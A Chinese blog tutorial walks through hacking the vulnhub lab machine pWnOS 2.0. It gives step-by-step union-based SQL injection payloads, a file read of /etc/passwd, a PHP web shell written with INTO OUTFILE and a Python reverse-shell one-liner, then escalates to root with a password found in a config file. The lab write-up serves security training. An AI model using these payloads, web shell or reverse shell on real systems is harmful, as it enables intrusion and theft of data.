黑客零基础第三章-Web漏洞实战-SQL注入pWnOS: 2.0

最新推荐文章于 2024-03-12 18:43:25 发布
最新推荐文章于 2024-03-12 18:43:25 发布
阅读量1.3k 收藏
点赞数 4
分类专栏: 零基础黑客训练 文章标签: 系统安全 web安全 安全架构 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43879344/article/details/119969506
版权

第八节内容讲述了文件上传漏洞的利用原理,并在DVWA上进行简单的入侵实验。本节以实战的方式,结合vulnhub靶机pWnOS: 2.0 ,让大家进一步SQL注入的实际应用场景。

pWnOS: 2.0这个靶机比较特殊,有多种方法可以进行入侵。低权限shell可以通过 SPHPBlog的一个文件上传漏洞或mysql手工注入。提权可以通过在敏感文件中直接获得root密码或者通过mysql UDF漏洞。本节为突出mysql手工注入,以sql注入+root密码来演示主机。

如果靶机部署有疑问,请留言!

目录

1.信息收集

2.获取低权限shell

 3.提权

4.总结

1.信息收集

此靶机比较特殊,vmware靶机。IP固定10.10.10.100,需要配置虚拟机NAT的IP,如下图所示,

配置完虚拟机后,开启kali,本机地址10.10.10.1

 

使用第二章nmap命令扫描靶机,

root@kali:~# nmap -p `nmap -p- --min-rate=10000 -T4 10.10.10.100| grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sC -sV --min-rate=10000 10.10.10.100                                                                                                 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-28 04:22 EDT                                                                  
Nmap scan report for 10.10.10.100                                                                                                
Host is up (0.00054s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
MAC Address: 00:0C:29:01:09:C2 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds

 打开浏览器发现有一个longin的界面

尝试sql注入,发现Email存在注入,

burp抓包,然后用repeater进行尝试,

 

2.获取低权限shell

order by获取当前数据表列数,

email=' order by 9-- -

 9出错,8正常,说明有8列。

union select查看哪一列数据显示在界面上。第四列能够显示。

email=' union select 1,2,3,4,5,6,7,8-- -

查看数据库版本

email=' union select 1,2,3,@@version,5,6,7,8-- -

查看当前用户,用户为root@localhost

email=' union select 1,2,3,user(),5,6,7,8-- -

查看数据库名,数据库为ch16.

email=' union select 1,2,3,database(),5,6,7,8-- -

查看数据库中的表,一个表叫users。

email=' union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()-- -

查看表users的列名

email=' union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='users'-- -

根据列查询表users的值。

email=' union select 1,2,3,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,email,0x3a,pass,0x3a,user_level,0x3a),5,6,7,8 from users-- -

 获得一组邮件和密码admin@isints.com:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af

将密码在crackstion上进行破译,发现失败。说明这个密码不可用。

尝试load_file功能,发现可以使用。

email=' union select null,null,null,load_file('/etc/passwd'),null,null,null,null-- -

尝试将一句话写入/var/www目录,

email=' union select null,null,null,"<?php system($_GET['cmd']);?>",null,null,null,null into outfile '/var/www/shell.php'-- -

验证写入的木马,发现已经写入。

email=' union select null,null,null,load_file('/var/www/shell.php'),null,null,null,null-- -

 

尝试执行木马,执行成功。

尝试nc获取反向shell,失败。

尝试python获取反向shell,

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

成功!

 

3.提权

当前目录下,发现一个连接mysql的php文件,这个文件里面肯定有mysql的用户名密码。

查看后发现一组用户名密码,

既然用户名是root,那这个密码可能就是root密码。尝试后失败。

 

切换到var目录又发现一个mysql_connect.php文件,打开后还有一个root密码。

登陆root成功!

4.总结

在发现这个靶机上存在sql注入后直接进行手动注入,获取了一组用户名密码。但密码被加密过无法解密。然后让尝试"into outfile"写入一句话到web目录下。提权直接在var目录下有个mysql连接的php文件,里面有root密码

第七感小宇宙
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pWnOS: 2.0 - linux
战神/calmness的博客
12-28 476
目录 靶机地址 信息收集 Whatweb 查是否是CMS 访问80页面 IsIntS 目录遍历 PHP信息版本 搜索漏洞利用 hydra 爆破web登录页面 尝试错误 爆破:killerbeesareflying 报错注入 输入账户密码登录blog 查看源码 注入读取文件load_file into outfile 函数 命令执行 反弹shell [一] 反弹shell [二] 提权 直接登录成功 (二)查看blog源码 MSF 登录成功 上传php-rev
PWNOSv2.0:Desarrollo del CTF PWNOSv2.0
03-06
PWNOSv2.0 Desarrollo del CTF PWNOSv2.0 下载: : 1.配置。 IP地址为10.10.10.100的虚拟虚拟环境配置。 视在实体之间的差异而进行的配置。 2.埃斯卡诺-德波多斯 root@kali:~/PWNOS# nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.100 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-04 21:36 EST Nmap scan report for 10.10.10.100 Host is up (0.00033s
pWnOS 2.0
底层社会中的弱智
04-29 535
目标IP 10.10.10.100 需要把NAT设置改为10.0网段 开放的端口只有两个 22 版本没有可利用漏洞 可以爆破 80 apache暂无可用exp 扫描目录 网页中有两个与数据库进行数据交互的地方 注册和登录 进行sql注入测试 登陆页面存在注入 获取登陆密码 登陆后没有有用的信息 @isints:killerbeesareflying 尝试使用lo...
pWnOS2.0靶场渗透练习&udf提权&推荐练习靶场&较经典的web渗透靶场&红队靶场
最新发布
jockerboss的博客
03-12 912
pWnOS2.0靶场练习&udf提权&推荐练习靶场&较经典的web渗透靶场&小白必练
vulnhub pWnOS_v2.0
n1ght的博客
01-27 163
尝试着去做一些ctf题目和靶机,vulnhub的难度还是非常的友好,熟悉一下。这个靶机pWnOS_v2.0还是需要自己配置网络地址的。
PWNOS_ 2.0 (PRE-RELEASE)
qq_57672166的博客
01-04 328
PWNOS_ 2.0 (PRE-RELEASE)
WEB安全-注入漏洞
10-11
WEB安全-注入漏洞,很好的学习PPT SQL注入是一种Web应用代码中的漏洞黑客可以构造特殊请求,使Web应用执行带有附加条件的SQL语句 用户请求中带有参数的值,没有进行任何过滤 用户请求中带有参数的值,没有进行...
WEB漏洞扫描器-AWVS 2020年4月最新版acunetix_14.7.220401065
04-18
量身定制的Web安全设备往往不够测试出一些还未发现的漏洞,因此容易成为黑客攻击目标。 Acunetix -在全世界范围内领先的网络应用安全设备 Acunetix开创了网络应用安全扫描技术:它的工程师们潜心研究网络安全。早...
awesome-web-hacking:Web应用程序安全性列表
02-13
Web应用程序黑客手册:发现和利用安全漏洞 入侵Web应用程序:检测和预防Web应用程序安全性问题 入侵暴露的Web应用程序 SQL注入攻击和防御 纠结的WEB:保护现代Web应用程序的指南 网络应用程序混淆:“-/ WAFs.....
Linux基础实战命令操作2.0,黑牛程序员
03-03
此文件涵盖了作者毕生经历所编撰而成的黑牛程序教学视频,大佬程序员亲自手把手零基础编程教学,不花一份钱,白嫖编程教学资源,编程小白必学教程,黑客大佬的私密学习的编程心得笔记,零基础学编程,从入门到元老,...
capbot2.0:用于存储在2021年SIIC国防黑客马拉松上展示的Cap-Bot版本的代码的存储库
03-20
Capbotsiic用于存储在2021年SIIC国防黑客马拉松上展示的人工变种代码的存储库。问题启发国防部正在使用大量监视设备进行监督和监视。然而,它们中的大多数是手动操作,这要花费大量的时间和人工。问题描述当前最先进...
Vulnhub靶机系列:pWnOS: 2.0
汗的博客
03-30 1508
文章目录靶机地址靶机设置利用知识信息收集并getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 靶机设置 靶机默认设置: IP: 10.10.10.100 Netmask: 255.255.255.0 Gateway: 10.10.10.15 所以攻击机需要在10.10.10.0/24网段 我在虚拟网络编辑器里...
靶场实战pWnOS2.0
qq_55415442的博客
07-14 120
靶场实战pWnOS2.0
Vulnhub靶机:PWNOS_ 2.0 (PRE-RELEASE)
LainWith的博客
12-23 1234
pWnOS(此系列共2台)发布日期:2011年7月4日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:靶机是静态IP,因此需要配置网卡为10.10.10.0主机发现端口扫描+漏洞扫描CMS漏洞利用SQL读写文件敏感信息提权。
【学渗透靶机 ——pWnOS: 2.0
jieli0901227的博客
04-12 254
靶机IP固定10.10.10.100,需要配置虚拟机NAT的IP,如下图所示,靶机的web目录是/var/www, 并且发现了一个配置文件,查看这个配置文件,使用命令查看是否安装nc 或者python,发现nc、和python 环境都有。主机开放了22 、80 端口 ,扫描这两个端口详细信息,扫描结果如下图。发现又有个账号root \goodday 尝试ssh 登录 失败,收集数据库信息获取到当前用户为root ,权限比较高,发现有登录和注册界面跳转,尝试访问看看。发现数据库配置文件:读取该文件信息。
Vulnhub靶机 pwnos v2.0
菜浪马废的博客
04-25 513
先看一下80 ports=$(nmap -p- --min-rate=1000 -sT -T4 10.10.10.100 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports -sT 10.10.10.100 爆破网站目录 找漏洞 发现以上内容 找漏洞 运行脚本 创...
vulnhub-pWnOS: 2.0 (考点; simpe php blog / sql 注入/linux提权)
冬萍子癸水
04-22 316
nmap 就80web 两种方法,一种是SQL注入,一种是利用博客漏洞 第一种 dirbuster看到有博客,这里继续信息搜集,扫blog下的内容。毕竟blog下肯定也有很多东西。。 发现这个博客叫simple php blog page info 看到是0.4.0 搜漏洞 打它 perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -...
PWNOS: 2.0 (PRE-RELEASE)
Mysmycbx的博客
03-14 151
pwnos2.0
vulnhub靶机pWnOS2.0
weixin_53665747的博客
06-13 142
偏简单,整体思路没有太难,利用过程也相对顺利。
sql注入漏洞挖掘实战
08-31
SQL注入漏洞挖掘实战是指通过利用SQL注入漏洞漏洞挖掘活动。SQL注入漏洞是一种常见的数据库攻击手段,用于利用应用程序对用户输入的SQL语句进行不当处理,从而导致恶意用户可以执行未经授权的数据库操作。这些操作包括读取、修改或删除数据库中的数据。 在SQL注入漏洞挖掘实战中,黑客通常会尝试通过构造特定的SQL语句来绕过应用程序的输入验证和过滤机制,以获取敏感信息或对数据库进行恶意操作。他们可能会使用各种技术和工具来自动化这个过程,并尝试发现和利用潜在的SQL注入漏洞。 为了防止SQL注入漏洞挖掘实战,开发人员应该采取以下措施: 1. 输入验证和过滤: 应用程序应该对用户输入进行严格的验证和过滤,确保只允许合法的字符和格式。使用参数化查询或预编译语句可以有效预防SQL注入攻击。 2. 最小权限原则: 数据库用户应该被授予最低权限,以限制对数据库的访问和操作。这样即使发生SQL注入攻击,黑客也只能执行有限的操作。 3. 安全编码实践: 开发人员应该熟悉安全编码实践,并使用安全的API和框架来构建应用程序。避免将用户输入直接拼接到SQL查询中,而是使用参数化查询或预编译语句。 4. 定期漏洞扫描和安全测试: 定期进行漏洞扫描和安全测试,以发现和修复潜在的SQL注入漏洞。这可以帮助及早发现和解决问题,确保应用程序的安全性。 总结起来,SQL注入漏洞挖掘实战黑客利用SQL注入漏洞进行恶意攻击的活动。为了防止这种漏洞的利用,开发人员需要采取一系列安全措施,包括输入验证和过滤、最小权限原则、安全编码实践和定期漏洞扫描和安全测试。这些措施可以帮助保护应用程序免受SQL注入漏洞的威胁。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入攻击实战演示(附源码)](https://blog.csdn.net/hack0919/article/details/129880265)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值